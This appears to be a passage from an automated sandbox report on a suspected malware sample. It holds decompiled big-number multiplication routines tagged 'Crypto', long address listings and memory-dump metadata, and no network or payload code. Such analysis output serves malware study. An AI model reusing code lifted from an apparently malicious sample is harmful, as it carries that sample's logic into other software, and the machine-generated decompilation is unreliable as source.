					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x2c)) = _t492;
				_t493 =  *(_t331 + 0x18);
				_t408 = _t493 & 0x0000ffff;
				_t494 = _t493 >> 0x10;
				_t623 = _t408 * _t494;
				_t624 = _t623 << 0x11;
				_t410 = _t408 * _t408 + _t624;
				_t496 = _t494 * _t494 + (_t623 >> 0xf);
				if(_t410 < _t624) {
					_t496 = _t496 + 1;
				}
				_t352 = _t351 + _t410;
				if(_t352 < _t410) {
					_t496 = _t496 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t496;
				if( *(_t633 - 4) < _t496) {
					 *(_t633 - 0xc) = 1;
				}
				_t570 =  *(_t331 + 0x14) & 0x0000ffff;
				_t625 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
				_t412 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t626 = _t625 * _t570;
				 *(_t633 - 0x14) = _t570;
				_t413 = _t412 *  *(_t633 - 0x10);
				_t572 = _t412 *  *(_t633 - 0x14);
				_t499 = _t625 *  *(_t633 - 0x10) + _t572;
				if(_t499 < _t572) {
					_t413 = _t413 + 0x10000;
				}
				_t500 = _t499 << 0x10;
				_t627 = _t626 + _t500;
				_t414 = _t413 + (_t499 >> 0x10);
				if(_t627 < _t500) {
					_t414 = _t414 + 1;
				}
				_t353 = _t352 + _t627;
				_t501 = _t414;
				 *(_t633 - 8) = _t353;
				if(_t353 < _t627) {
					_t501 = _t414 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t501;
				if( *(_t633 - 4) < _t501) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t503 =  *(_t633 - 8) + _t627;
				if(_t503 < _t627) {
					_t414 = _t414 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t414;
				if( *(_t633 - 4) < _t414) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t354 =  *(_t633 + 8);
				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
				 *((intOrPtr*)(_t354 + 0x30)) = _t503;
				_t575 =  *(_t331 + 0x18) & 0x0000ffff;
				_t628 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 + 8) =  *(_t331 + 0x1a) & 0x0000ffff;
				_t416 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t629 = _t628 * _t575;
				 *(_t633 - 0x14) = _t575;
				_t417 = _t416 *  *(_t633 + 8);
				_t577 = _t416 *  *(_t633 - 0x14);
				_t506 = _t628 *  *(_t633 + 8) + _t577;
				if(_t506 < _t577) {
					_t417 = _t417 + 0x10000;
				}
				_t507 = _t506 << 0x10;
				_t630 = _t629 + _t507;
				_t418 = _t417 + (_t506 >> 0x10);
				if(_t630 < _t507) {
					_t418 = _t418 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t630;
				 *(_t633 + 8) = _t418;
				_t508 = _t418;
				if( *(_t633 - 4) < _t630) {
					_t319 = _t418 + 1; // 0x1
					_t508 = _t319;
				}
				_t581 =  *(_t633 - 0xc) + _t508;
				if(_t581 < _t508) {
					 *(_t633 - 8) = 1;
				}
				_t510 =  *(_t633 - 4) + _t630;
				_t419 = _t418 + 1;
				if(_t419 >= 0) {
					_t419 =  *(_t633 + 8);
				}
				_t582 = _t581 + _t419;
				if(_t582 < _t419) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *((intOrPtr*)(_t354 + 0x34)) = _t510;
				_t332 =  *(_t331 + 0x1c);
				_t631 = _t332 & 0x0000ffff;
				_t333 = _t332 >> 0x10;
				_t512 = _t631 * _t333;
				_t422 = _t333 * _t333 + (_t512 >> 0xf);
				_t513 = _t512 << 0x11;
				_t338 = _t631 * _t631 + _t513;
				if(_t338 < _t513) {
					_t422 = _t422 + 1;
				}
				_t583 = _t582 + _t338;
				if(_t583 < _t338) {
					_t422 = _t422 + 1;
				}
				 *((intOrPtr*)(_t354 + 0x38)) = _t583;
				 *((intOrPtr*)(_t354 + 0x3c)) = _t422 +  *(_t633 - 8);
				return _t338;
			}
































































































































































































    0x003a9885
    0x003a9885
    0x003a9885
    0x003a9885
    0x003a988a
    0x003a988c
    0x003a988c
    0x003a9892
    0x003a9896
    0x003a9898
    0x003a9898
    0x003a989e
    0x003a98a2
    0x003a98a4
    0x003a98a4
    0x003a98a5
    0x003a98a9
    0x003a98ab
    0x003a98ab
    0x003a98b1
    0x003a98b5
    0x003a98b8
    0x003a98bb
    0x003a98be
    0x003a98c6
    0x003a98ce
    0x003a98d4
    0x003a98d6
    0x003a98da
    0x003a98dc
    0x003a98dc
    0x003a98dd
    0x003a98e1
    0x003a98e3
    0x003a98e3
    0x003a98e4
    0x003a98ea
    0x003a98ec
    0x003a98ec
    0x003a98f7
    0x003a98fb
    0x003a98ff
    0x003a9902
    0x003a9908
    0x003a990f
    0x003a9914
    0x003a9918
    0x003a991c
    0x003a9920
    0x003a9922
    0x003a9922
    0x003a992a
    0x003a9930
    0x003a9932
    0x003a9936
    0x003a9938
    0x003a9938
    0x003a9939
    0x003a993b
    0x003a993d
    0x003a9942
    0x003a9944
    0x003a9944
    0x003a9947
    0x003a994d
    0x003a994f
    0x003a994f
    0x003a9952
    0x003a9958
    0x003a995a
    0x003a995a
    0x003a995b
    0x003a9961
    0x003a9963
    0x003a9963
    0x003a996a
    0x003a996e
    0x003a9972
    0x003a9975
    0x003a997b
    0x003a9982
    0x003a9987
    0x003a998b
    0x003a998f
    0x003a9993
    0x003a9995
    0x003a9995
    0x003a999d
    0x003a99a3
    0x003a99a5
    0x003a99a9
    0x003a99ab
    0x003a99ab
    0x003a99ac
    0x003a99af
    0x003a99b4
    0x003a99b6
    0x003a99b6
    0x003a99b9
    0x003a99bf
    0x003a99c1
    0x003a99c1
    0x003a99c4
    0x003a99ca
    0x003a99cc
    0x003a99cc
    0x003a99cd
    0x003a99d3
    0x003a99d5
    0x003a99d5
    0x003a99dc
    0x003a99e0
    0x003a99e4
    0x003a99e7
    0x003a99ed
    0x003a99f4
    0x003a99f9
    0x003a99fd
    0x003a9a01
    0x003a9a05
    0x003a9a07
    0x003a9a07
    0x003a9a0f
    0x003a9a15
    0x003a9a17
    0x003a9a1b
    0x003a9a1d
    0x003a9a1d
    0x003a9a1e
    0x003a9a21
    0x003a9a26
    0x003a9a28
    0x003a9a28
    0x003a9a2b
    0x003a9a31
    0x003a9a33
    0x003a9a33
    0x003a9a39
    0x003a9a3d
    0x003a9a3f
    0x003a9a3f
    0x003a9a40
    0x003a9a46
    0x003a9a48
    0x003a9a48
    0x003a9a4e
    0x003a9a52
    0x003a9a59
    0x003a9a5d
    0x003a9a61
    0x003a9a64
    0x003a9a6a
    0x003a9a71
    0x003a9a76
    0x003a9a7a
    0x003a9a7e
    0x003a9a82
    0x003a9a84
    0x003a9a84
    0x003a9a8c
    0x003a9a92
    0x003a9a94
    0x003a9a98
    0x003a9a9a
    0x003a9a9a
    0x003a9a9b
    0x003a9a9e
    0x003a9aa3
    0x003a9aa5
    0x003a9aa5
    0x003a9aa8
    0x003a9aae
    0x003a9ab0
    0x003a9ab0
    0x003a9ab7
    0x003a9abd
    0x003a9abf
    0x003a9abf
    0x003a9ac0
    0x003a9ac6
    0x003a9ac8
    0x003a9ac8
    0x003a9acf
    0x003a9ad3
    0x003a9ad7
    0x003a9ada
    0x003a9ae0
    0x003a9ae7
    0x003a9aec
    0x003a9af0
    0x003a9af4
    0x003a9af8
    0x003a9afa
    0x003a9afa
    0x003a9b02
    0x003a9b08
    0x003a9b0a
    0x003a9b0e
    0x003a9b10
    0x003a9b10
    0x003a9b11
    0x003a9b14
    0x003a9b19
    0x003a9b1b
    0x003a9b1b
    0x003a9b1e
    0x003a9b24
    0x003a9b26
    0x003a9b26
    0x003a9b29
    0x003a9b2f
    0x003a9b31
    0x003a9b31
    0x003a9b32
    0x003a9b38
    0x003a9b3a
    0x003a9b3a
    0x003a9b41
    0x003a9b45
    0x003a9b49
    0x003a9b4c
    0x003a9b52
    0x003a9b59
    0x003a9b5e
    0x003a9b62
    0x003a9b66
    0x003a9b6a
    0x003a9b6c
    0x003a9b6c
    0x003a9b74
    0x003a9b7a
    0x003a9b7c
    0x003a9b80
    0x003a9b82
    0x003a9b82
    0x003a9b83
    0x003a9b86
    0x003a9b8b
    0x003a9b8d
    0x003a9b8d
    0x003a9b93
    0x003a9b97
    0x003a9b99
    0x003a9b99
    0x003a9b9f
    0x003a9ba3
    0x003a9ba5
    0x003a9ba5
    0x003a9ba6
    0x003a9baa
    0x003a9bac
    0x003a9bac
    0x003a9bb2
    0x003a9bb6
    0x003a9bb9
    0x003a9bbc
    0x003a9bbf
    0x003a9bc7
    0x003a9bcf
    0x003a9bd5
    0x003a9bd7
    0x003a9bdb
    0x003a9bdd
    0x003a9bdd
    0x003a9bde
    0x003a9be2
    0x003a9be4
    0x003a9be4
    0x003a9be5
    0x003a9beb
    0x003a9bed
    0x003a9bed
    0x003a9bf8
    0x003a9bfc
    0x003a9c00
    0x003a9c03
    0x003a9c09
    0x003a9c10
    0x003a9c15
    0x003a9c19
    0x003a9c1d
    0x003a9c21
    0x003a9c23
    0x003a9c23
    0x003a9c2b
    0x003a9c31
    0x003a9c33
    0x003a9c37
    0x003a9c39
    0x003a9c39
    0x003a9c3a
    0x003a9c3c
    0x003a9c3e
    0x003a9c43
    0x003a9c45
    0x003a9c45
    0x003a9c48
    0x003a9c4e
    0x003a9c50
    0x003a9c50
    0x003a9c53
    0x003a9c59
    0x003a9c5b
    0x003a9c5b
    0x003a9c5c
    0x003a9c62
    0x003a9c64
    0x003a9c64
    0x003a9c6b
    0x003a9c6f
    0x003a9c73
    0x003a9c76
    0x003a9c7c
    0x003a9c83
    0x003a9c88
    0x003a9c8c
    0x003a9c90
    0x003a9c94
    0x003a9c96
    0x003a9c96
    0x003a9c9e
    0x003a9ca4
    0x003a9ca6
    0x003a9caa
    0x003a9cac
    0x003a9cac
    0x003a9cad
    0x003a9cb0
    0x003a9cb5
    0x003a9cb7
    0x003a9cb7
    0x003a9cba
    0x003a9cc0
    0x003a9cc2
    0x003a9cc2
    0x003a9cc8
    0x003a9ccc
    0x003a9cce
    0x003a9cce
    0x003a9ccf
    0x003a9cd5
    0x003a9cd7
    0x003a9cd7
    0x003a9cdd
    0x003a9ce1
    0x003a9ce8
    0x003a9cec
    0x003a9cf0
    0x003a9cf3
    0x003a9cf9
    0x003a9d00
    0x003a9d05
    0x003a9d09
    0x003a9d0d
    0x003a9d11
    0x003a9d13
    0x003a9d13
    0x003a9d1b
    0x003a9d21
    0x003a9d23
    0x003a9d27
    0x003a9d29
    0x003a9d29
    0x003a9d2a
    0x003a9d2d
    0x003a9d32
    0x003a9d34
    0x003a9d34
    0x003a9d37
    0x003a9d3d
    0x003a9d3f
    0x003a9d3f
    0x003a9d46
    0x003a9d4c
    0x003a9d4e
    0x003a9d4e
    0x003a9d4f
    0x003a9d55
    0x003a9d57
    0x003a9d57
    0x003a9d5e
    0x003a9d62
    0x003a9d66
    0x003a9d69
    0x003a9d6f
    0x003a9d76
    0x003a9d7b
    0x003a9d7f
    0x003a9d83
    0x003a9d87
    0x003a9d89
    0x003a9d89
    0x003a9d91
    0x003a9d97
    0x003a9d99
    0x003a9d9d
    0x003a9d9f
    0x003a9d9f
    0x003a9da0
    0x003a9da3
    0x003a9da8
    0x003a9daa
    0x003a9daa
    0x003a9db0
    0x003a9db4
    0x003a9db6
    0x003a9db6
    0x003a9dbc
    0x003a9dc0
    0x003a9dc2
    0x003a9dc2
    0x003a9dc3
    0x003a9dc7
    0x003a9dc9
    0x003a9dc9
    0x003a9dcf
    0x003a9dd3
    0x003a9dd6
    0x003a9dd9
    0x003a9ddc
    0x003a9de4
    0x003a9dec
    0x003a9df2
    0x003a9df4
    0x003a9df8
    0x003a9dfa
    0x003a9dfa
    0x003a9dfb
    0x003a9dff
    0x003a9e01
    0x003a9e01
    0x003a9e02
    0x003a9e08
    0x003a9e0a
    0x003a9e0a
    0x003a9e15
    0x003a9e19
    0x003a9e1d
    0x003a9e20
    0x003a9e26
    0x003a9e2d
    0x003a9e32
    0x003a9e36
    0x003a9e3a
    0x003a9e3e
    0x003a9e40
    0x003a9e40
    0x003a9e48
    0x003a9e4e
    0x003a9e50
    0x003a9e54
    0x003a9e56
    0x003a9e56
    0x003a9e57
    0x003a9e59
    0x003a9e5b
    0x003a9e60
    0x003a9e62
    0x003a9e62
    0x003a9e65
    0x003a9e6b
    0x003a9e6d
    0x003a9e6d
    0x003a9e73
    0x003a9e77
    0x003a9e79
    0x003a9e79
    0x003a9e7a
    0x003a9e80
    0x003a9e82
    0x003a9e82
    0x003a9e85
    0x003a9e88
    0x003a9e8c
    0x003a9e93
    0x003a9e97
    0x003a9e9b
    0x003a9e9e
    0x003a9ea4
    0x003a9eab
    0x003a9eb0
    0x003a9eb4
    0x003a9eb8
    0x003a9ebc
    0x003a9ebe
    0x003a9ebe
    0x003a9ec6
    0x003a9ecc
    0x003a9ece
    0x003a9ed2
    0x003a9ed4
    0x003a9ed4
    0x003a9ed5
    0x003a9ed8
    0x003a9edb
    0x003a9ee0
    0x003a9ee2
    0x003a9ee2
    0x003a9ee2
    0x003a9ee8
    0x003a9eec
    0x003a9eee
    0x003a9eee
    0x003a9ef8
    0x003a9efc
    0x003a9efd
    0x003a9eff
    0x003a9eff
    0x003a9f02
    0x003a9f06
    0x003a9f08
    0x003a9f08
    0x003a9f0b
    0x003a9f0e
    0x003a9f11
    0x003a9f14
    0x003a9f1e
    0x003a9f26
    0x003a9f2d
    0x003a9f30
    0x003a9f34
    0x003a9f36
    0x003a9f36
    0x003a9f37
    0x003a9f3b
    0x003a9f3d
    0x003a9f3d
    0x003a9f41
    0x003a9f46
    0x003a9f4b

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A8A1C, Relevance: .6, Instructions: 568Crypto
    C-Code - Quality: 100%
    			E003A8A1C(signed short* __eax, signed short* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed short* _t258;
				unsigned int _t261;
				signed int _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t268;
				unsigned int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				signed int _t283;
				signed int _t285;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t297;
				signed int _t299;
				signed short* _t300;
				signed int _t301;
				signed int _t302;
				void* _t303;
				signed int _t306;
				signed int _t307;
				intOrPtr _t308;
				signed int _t309;
				signed int _t310;
				void* _t311;
				signed int _t315;
				signed int _t316;
				intOrPtr _t318;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				intOrPtr _t335;
				signed int _t339;
				signed int _t340;
				signed int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int _t361;
				signed int _t362;
				signed int _t366;
				signed int _t367;
				signed int _t371;
				signed int _t372;
				intOrPtr _t374;
				signed int _t378;
				signed int _t379;
				signed int _t383;
				signed int _t384;
				intOrPtr _t386;
				signed int _t387;
				signed int _t388;
				void* _t389;
				signed int _t390;
				signed int _t398;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				signed int _t406;
				signed int _t409;
				void* _t413;
				signed int _t414;
				signed int _t417;
				void* _t421;
				signed int _t422;
				signed int _t425;
				void* _t429;
				signed int _t430;
				signed int _t433;
				void* _t437;
				signed int _t438;
				signed int _t441;
				void* _t445;
				signed int _t446;
				signed int _t449;
				void* _t453;
				signed int _t454;
				signed int _t457;
				void* _t461;
				signed int _t462;
				signed int _t465;
				void* _t469;
				signed int _t470;
				signed int _t473;
				void* _t477;
				signed int _t478;
				signed int _t481;
				void* _t485;
				signed int _t486;
				signed int _t489;
				void* _t493;
				signed int _t494;
				signed int _t497;
				void* _t501;
				signed int _t502;
				unsigned int _t505;
				signed int _t506;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t514;
				void* _t518;
				signed int _t520;
				signed int _t522;
				signed int _t523;
				void* _t524;
				signed int _t525;
				signed int _t526;
				void* _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				signed int _t532;
				signed int _t533;
				void* _t534;
				signed int _t535;
				signed int _t536;
				void* _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				signed int _t541;
				signed int _t542;
				void* _t543;
				signed int _t545;
				signed int _t546;
				void* _t547;
				signed int _t548;
				signed int _t549;
				void* _t550;
				signed int _t551;
				signed int _t552;
				void* _t553;
				signed int _t555;
				signed int _t556;
				void* _t557;
				signed int _t558;
				signed int _t559;
				void* _t560;
				signed int _t563;
				intOrPtr _t567;

				_t300 = __ecx;
				_t258 = __eax;
				_t264 =  *__eax & 0x0000ffff;
				_t390 = __ecx[1] & 0x0000ffff;
				_v16 = _t390;
				_v20 = __eax[1] & 0x0000ffff;
				_t306 =  *__ecx & 0x0000ffff;
				_t307 = _t306 * _t264;
				_v12 = _t390 * _t264;
				_t505 = _t306 * _v20 + _v12;
				_v16 = _v16 * (__eax[1] & 0x0000ffff);
				if(_t505 < _v12) {
					_v16 = _v16 + 0x10000;
				}
				_t506 = _t505 << 0x10;
				_v16 = _v16 + (_t505 >> 0x10);
				_t308 = _t307 + _t506;
				if(_t308 < _t506) {
					_v16 = _v16 + 1;
				}
				 *_a4 = _t308;
				_t309 =  *_t300 & 0x0000ffff;
				_t508 = _t300[1] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_t268 = _t258[2] & 0x0000ffff;
				_v20 = _t309 * (_t258[3] & 0x0000ffff);
				_t310 = _t309 * _t268;
				_t398 = _t508 * _t268;
				_t509 = _t508 * (_t258[3] & 0x0000ffff);
				_t271 = _v20 + _t398;
				if(_t271 < _t398) {
					_t509 = _t509 + 0x10000;
				}
				_t272 = _t271 << 0x10;
				_t311 = _t310 + _t272;
				_t510 = _t509 + (_t271 >> 0x10);
				if(_t311 < _t272) {
					_t510 = _t510 + 1;
				}
				_t402 = _v16 + _t311;
				_v20 = _t510;
				_v12 = _t402;
				if(_t402 < _t311) {
					_v20 = _t510 + 1;
				}
				_t273 =  *_t258 & 0x0000ffff;
				_t511 = _t300[2] & 0x0000ffff;
				_t403 = _t300[3] & 0x0000ffff;
				_v16 = _t258[1] & 0x0000ffff;
				_v16 = _t511 * _t273;
				_t514 = _t403 * _t273;
				_t315 = _t511 * _v16 + _t514;
				_t404 = _t403 * (_t258[1] & 0x0000ffff);
				if(_t315 < _t514) {
					_t404 = _t404 + 0x10000;
				}
				_t405 = _t404 + (_t315 >> 0x10);
				_t316 = _t315 << 0x10;
				_t518 = _v16 + _t316;
				if(_t518 < _t316) {
					_t405 = _t405 + 1;
				}
				_t318 = _v12 + _t518;
				if(_t318 < _t518) {
					_t405 = _t405 + 1;
				}
				_t520 = _v20 + _t405;
				_v16 = _t520;
				if(_t520 < _t405) {
					_v8 = 1;
				}
				 *((intOrPtr*)(_a4 + 4)) = _t318;
				_t275 =  *_t258 & 0x0000ffff;
				_t406 = _t300[4] & 0x0000ffff;
				_t522 = _t300[5] & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v20 = _t258[1] & 0x0000ffff;
				_v20 = _t406 * _t275;
				_t409 = _t522 * _t275;
				_t322 = _t406 * _v20 + _t409;
				_t523 = _t522 * (_t258[1] & 0x0000ffff);
				if(_t322 < _t409) {
					_t523 = _t523 + 0x10000;
				}
				_t524 = _t523 + (_t322 >> 0x10);
				_t323 = _t322 << 0x10;
				_t413 = _v20 + _t323;
				if(_t413 < _t323) {
					_t524 = _t524 + 1;
				}
				_v16 = _v16 + _t413;
				if(_v16 < _t413) {
					_t524 = _t524 + 1;
				}
				_v8 = _v8 + _t524;
				if(_v8 < _t524) {
					_v12 = 1;
				}
				_t277 = _t258[2] & 0x0000ffff;
				_t414 = _t300[2] & 0x0000ffff;
				_t525 = _t300[3] & 0x0000ffff;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t414 * _t277;
				_t417 = _t525 * _t277;
				_t327 = _t414 * _v20 + _t417;
				_t526 = _t525 * (_t258[3] & 0x0000ffff);
				if(_t327 < _t417) {
					_t526 = _t526 + 0x10000;
				}
				_t527 = _t526 + (_t327 >> 0x10);
				_t328 = _t327 << 0x10;
				_t421 = _v20 + _t328;
				if(_t421 < _t328) {
					_t527 = _t527 + 1;
				}
				_v16 = _v16 + _t421;
				if(_v16 < _t421) {
					_t527 = _t527 + 1;
				}
				_v8 = _v8 + _t527;
				if(_v8 < _t527) {
					_v12 = _v12 + 1;
				}
				_t279 = _t258[4] & 0x0000ffff;
				_t422 =  *_t300 & 0x0000ffff;
				_t528 = _t300[1] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t422 * _t279;
				_t425 = _t528 * _t279;
				_t332 = _t422 * _v20 + _t425;
				_t529 = _t528 * (_t258[5] & 0x0000ffff);
				if(_t332 < _t425) {
					_t529 = _t529 + 0x10000;
				}
				_t530 = _t529 + (_t332 >> 0x10);
				_t333 = _t332 << 0x10;
				_t429 = _v20 + _t333;
				if(_t429 < _t333) {
					_t530 = _t530 + 1;
				}
				_t335 = _v16 + _t429;
				if(_t335 < _t429) {
					_t530 = _t530 + 1;
				}
				_v8 = _v8 + _t530;
				if(_v8 < _t530) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_a4 + 8)) = _t335;
				_t281 = _t258[6] & 0x0000ffff;
				_t430 =  *_t300 & 0x0000ffff;
				_t532 = _t300[1] & 0x0000ffff;
				_v16 = _v16 & 0x00000000;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t430 * _t281;
				_t433 = _t532 * _t281;
				_t339 = _t430 * _v20 + _t433;
				_t533 = _t532 * (_t258[7] & 0x0000ffff);
				if(_t339 < _t433) {
					_t533 = _t533 + 0x10000;
				}
				_t534 = _t533 + (_t339 >> 0x10);
				_t340 = _t339 << 0x10;
				_t437 = _v20 + _t340;
				if(_t437 < _t340) {
					_t534 = _t534 + 1;
				}
				_v8 = _v8 + _t437;
				if(_v8 < _t437) {
					_t534 = _t534 + 1;
				}
				_v12 = _v12 + _t534;
				if(_v12 < _t534) {
					_v16 = 1;
				}
				_t283 = _t258[4] & 0x0000ffff;
				_t438 = _t300[2] & 0x0000ffff;
				_t535 = _t300[3] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t438 * _t283;
				_t441 = _t535 * _t283;
				_t344 = _t438 * _v20 + _t441;
				_t536 = _t535 * (_t258[5] & 0x0000ffff);
				if(_t344 < _t441) {
					_t536 = _t536 + 0x10000;
				}
				_t537 = _t536 + (_t344 >> 0x10);
				_t345 = _t344 << 0x10;
				_t445 = _v20 + _t345;
				if(_t445 < _t345) {
					_t537 = _t537 + 1;
				}
				_v8 = _v8 + _t445;
				if(_v8 < _t445) {
					_t537 = _t537 + 1;
				}
				_v12 = _v12 + _t537;
				if(_v12 < _t537) {
					_v16 = _v16 + 1;
				}
				_t285 = _t258[2] & 0x0000ffff;
				_t446 = _t300[4] & 0x0000ffff;
				_t538 = _t300[5] & 0x0000ffff;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t446 * _t285;
				_t449 = _t538 * _t285;
				_t349 = _t446 * _v20 + _t449;
				_t539 = _t538 * (_t258[3] & 0x0000ffff);
				if(_t349 < _t449) {
					_t539 = _t539 + 0x10000;
				}
				_t540 = _t539 + (_t349 >> 0x10);
				_t350 = _t349 << 0x10;
				_t453 = _v20 + _t350;
				if(_t453 < _t350) {
					_t540 = _t540 + 1;
				}
				_v8 = _v8 + _t453;
				if(_v8 < _t453) {
					_t540 = _t540 + 1;
				}
				_v12 = _v12 + _t540;
				if(_v12 < _t540) {
					_v16 = _v16 + 1;
				}
				_t287 =  *_t258 & 0x0000ffff;
				_t454 = _t300[6] & 0x0000ffff;
				_t541 = _t300[7] & 0x0000ffff;
				_v20 = _t258[1] & 0x0000ffff;
				_v20 = _t454 * _t287;
				_t457 = _t541 * _t287;
				_t354 = _t454 * _v20 + _t457;
				_t542 = _t541 * (_t258[1] & 0x0000ffff);
				if(_t354 < _t457) {
					_t542 = _t542 + 0x10000;
				}
				_t543 = _t542 + (_t354 >> 0x10);
				_t355 = _t354 << 0x10;
				_t461 = _v20 + _t355;
				if(_t461 < _t355) {
					_t543 = _t543 + 1;
				}
				_t357 = _v8 + _t461;
				if(_t357 < _t461) {
					_t543 = _t543 + 1;
				}
				_v12 = _v12 + _t543;
				if(_v12 < _t543) {
					_v16 = _v16 + 1;
				}
				 *((intOrPtr*)(_a4 + 0xc)) = _t357;
				_t289 = _t258[2] & 0x0000ffff;
				_t462 = _t300[6] & 0x0000ffff;
				_t545 = _t300[7] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_v20 = _t258[3] & 0x0000ffff;
				_v20 = _t462 * _t289;
				_t465 = _t545 * _t289;
				_t361 = _t462 * _v20 + _t465;
				_t546 = _t545 * (_t258[3] & 0x0000ffff);
				if(_t361 < _t465) {
					_t546 = _t546 + 0x10000;
				}
				_t547 = _t546 + (_t361 >> 0x10);
				_t362 = _t361 << 0x10;
				_t469 = _v20 + _t362;
				if(_t469 < _t362) {
					_t547 = _t547 + 1;
				}
				_v12 = _v12 + _t469;
				if(_v12 < _t469) {
					_t547 = _t547 + 1;
				}
				_v16 = _v16 + _t547;
				if(_v16 < _t547) {
					_v8 = 1;
				}
				_t291 = _t258[4] & 0x0000ffff;
				_t470 = _t300[4] & 0x0000ffff;
				_t548 = _t300[5] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t470 * _t291;
				_t473 = _t548 * _t291;
				_t366 = _t470 * _v20 + _t473;
				_t549 = _t548 * (_t258[5] & 0x0000ffff);
				if(_t366 < _t473) {
					_t549 = _t549 + 0x10000;
				}
				_t550 = _t549 + (_t366 >> 0x10);
				_t367 = _t366 << 0x10;
				_t477 = _v20 + _t367;
				if(_t477 < _t367) {
					_t550 = _t550 + 1;
				}
				_v12 = _v12 + _t477;
				if(_v12 < _t477) {
					_t550 = _t550 + 1;
				}
				_v16 = _v16 + _t550;
				if(_v16 < _t550) {
					_v8 = _v8 + 1;
				}
				_t293 = _t258[6] & 0x0000ffff;
				_t478 = _t300[2] & 0x0000ffff;
				_t551 = _t300[3] & 0x0000ffff;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t478 * _t293;
				_t481 = _t551 * _t293;
				_t371 = _t478 * _v20 + _t481;
				_t552 = _t551 * (_t258[7] & 0x0000ffff);
				if(_t371 < _t481) {
					_t552 = _t552 + 0x10000;
				}
				_t553 = _t552 + (_t371 >> 0x10);
				_t372 = _t371 << 0x10;
				_t485 = _v20 + _t372;
				if(_t485 < _t372) {
					_t553 = _t553 + 1;
				}
				_t374 = _v12 + _t485;
				if(_t374 < _t485) {
					_t553 = _t553 + 1;
				}
				_v16 = _v16 + _t553;
				if(_v16 < _t553) {
					_v8 = _v8 + 1;
				}
				 *((intOrPtr*)(_a4 + 0x10)) = _t374;
				_t295 = _t258[6] & 0x0000ffff;
				_t486 = _t300[4] & 0x0000ffff;
				_t555 = _t300[5] & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v20 = _t258[7] & 0x0000ffff;
				_v20 = _t486 * _t295;
				_t489 = _t555 * _t295;
				_t378 = _t486 * _v20 + _t489;
				_t556 = _t555 * (_t258[7] & 0x0000ffff);
				if(_t378 < _t489) {
					_t556 = _t556 + 0x10000;
				}
				_t557 = _t556 + (_t378 >> 0x10);
				_t379 = _t378 << 0x10;
				_t493 = _v20 + _t379;
				if(_t493 < _t379) {
					_t557 = _t557 + 1;
				}
				_v16 = _v16 + _t493;
				if(_v16 < _t493) {
					_t557 = _t557 + 1;
				}
				_v8 = _v8 + _t557;
				if(_v8 < _t557) {
					_v12 = 1;
				}
				_t297 = _t258[4] & 0x0000ffff;
				_t494 = _t300[6] & 0x0000ffff;
				_t558 = _t300[7] & 0x0000ffff;
				_v20 = _t258[5] & 0x0000ffff;
				_v20 = _t494 * _t297;
				_t497 = _t558 * _t297;
				_t383 = _t494 * _v20 + _t497;
				_t559 = _t558 * (_t258[5] & 0x0000ffff);
				if(_t383 < _t497) {
					_t559 = _t559 + 0x10000;
				}
				_t560 = _t559 + (_t383 >> 0x10);
				_t384 = _t383 << 0x10;
				_t501 = _v20 + _t384;
				if(_t501 < _t384) {
					_t560 = _t560 + 1;
				}
				_t386 = _v16 + _t501;
				if(_t386 < _t501) {
					_t560 = _t560 + 1;
				}
				_v8 = _v8 + _t560;
				if(_v8 < _t560) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_a4 + 0x14)) = _t386;
				_t387 = _t300[6] & 0x0000ffff;
				_t502 = _t258[6] & 0x0000ffff;
				_t299 = _t258[7] & 0x0000ffff;
				_t301 = _t300[7] & 0x0000ffff;
